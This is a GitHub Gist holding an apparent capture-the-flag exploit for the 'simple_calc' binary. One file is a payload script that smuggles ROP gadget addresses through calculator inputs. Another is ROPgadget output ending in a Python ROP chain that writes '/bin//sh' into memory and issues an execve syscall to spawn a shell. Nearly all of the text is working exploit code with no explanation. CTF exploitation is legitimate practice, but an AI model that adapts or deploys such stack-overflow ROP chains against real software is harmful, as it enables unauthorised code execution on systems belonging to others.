Last active
April 10, 2016 05:44
-
-
Save eugenekolo/d07741d6e7b261b3c339 to your computer and use it in GitHub Desktop.
Ropchain for BkP simple_calc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| print(2);print(int(0x0000000000401c87)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x00000000006c1060)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x000000000044db34)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x6e69622f)+100);print(100);print(''); | |
| print(2);print(int(0x68732f2f)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000470f11)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000401c87)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x00000000006c1068)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x000000000041c61f)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000470f11)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000401b73)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x00000000006c1060)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000401c87)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x00000000006c1068)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000437a85)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x00000000006c1068)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x000000000041c61f)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print(''); | |
| print(2);print(int(0x0000000000400488)+100);print(100);print('');print(2);print(100);print(100);print(''); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 254 | |
| 2 | |
| 100 | |
| 99 | |
| 2 | |
| 100 | |
| 98 | |
| 2 | |
| 100 | |
| 97 | |
| 2 | |
| 100 | |
| 96 | |
| 2 | |
| 100 | |
| 95 | |
| 2 | |
| 100 | |
| 94 | |
| 2 | |
| 100 | |
| 93 | |
| 2 | |
| 100 | |
| 92 | |
| 2 | |
| 100 | |
| 91 | |
| 2 | |
| 100 | |
| 90 | |
| 2 | |
| 100 | |
| 89 | |
| 2 | |
| 100 | |
| 88 | |
| 2 | |
| 100 | |
| 100 | |
| 2 | |
| 100 | |
| 100 | |
| 2 | |
| 100 | |
| 85 | |
| 2 | |
| 100 | |
| 84 | |
| 2 | |
| 100 | |
| 83 | |
| 2 | |
| 100 | |
| 82 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ROP chain generation | |
| =========================================================== | |
| - Step 1 -- Write-what-where gadgets | |
| [+] Gadget found: 0x470f11 mov qword ptr [rsi], rax ; ret | |
| [+] Gadget found: 0x401c87 pop rsi ; ret | |
| [+] Gadget found: 0x44db34 pop rax ; ret | |
| [+] Gadget found: 0x41c61f xor rax, rax ; ret | |
| - Step 2 -- Init syscall number gadgets | |
| [+] Gadget found: 0x41c61f xor rax, rax ; ret | |
| [+] Gadget found: 0x463b90 add rax, 1 ; ret | |
| [+] Gadget found: 0x463b91 add eax, 1 ; ret | |
| - Step 3 -- Init syscall arguments gadgets | |
| [+] Gadget found: 0x401b73 pop rdi ; ret | |
| [+] Gadget found: 0x401c87 pop rsi ; ret | |
| [+] Gadget found: 0x437a85 pop rdx ; ret | |
| - Step 4 -- Syscall gadget | |
| [+] Gadget found: 0x400488 syscall | |
| - Step 5 -- Build the ROP chain | |
| #!/usr/bin/env python2 | |
| # execve generated by ROPgadget | |
| from struct import pack | |
| # Padding goes here | |
| p = '' | |
| p += pack('<Q', 0x0000000000401c87) # pop rsi ; ret | |
| p += pack('<Q', 0x00000000006c1060) # @ .data | |
| p += pack('<Q', 0x000000000044db34) # pop rax ; ret | |
| p += '/bin//sh' | |
| p += pack('<Q', 0x0000000000470f11) # mov qword ptr [rsi], rax ; ret | |
| p += pack('<Q', 0x0000000000401c87) # pop rsi ; ret | |
| p += pack('<Q', 0x00000000006c1068) # @ .data + 8 | |
| p += pack('<Q', 0x000000000041c61f) # xor rax, rax ; ret | |
| p += pack('<Q', 0x0000000000470f11) # mov qword ptr [rsi], rax ; ret | |
| p += pack('<Q', 0x0000000000401b73) # pop rdi ; ret | |
| p += pack('<Q', 0x00000000006c1060) # @ .data | |
| p += pack('<Q', 0x0000000000401c87) # pop rsi ; ret | |
| p += pack('<Q', 0x00000000006c1068) # @ .data + 8 | |
| p += pack('<Q', 0x0000000000437a85) # pop rdx ; ret | |
| p += pack('<Q', 0x00000000006c1068) # @ .data + 8 | |
| p += pack('<Q', 0x000000000041c61f) # xor rax, rax ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret | |
| p += pack('<Q', 0x0000000000400488) # syscall |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment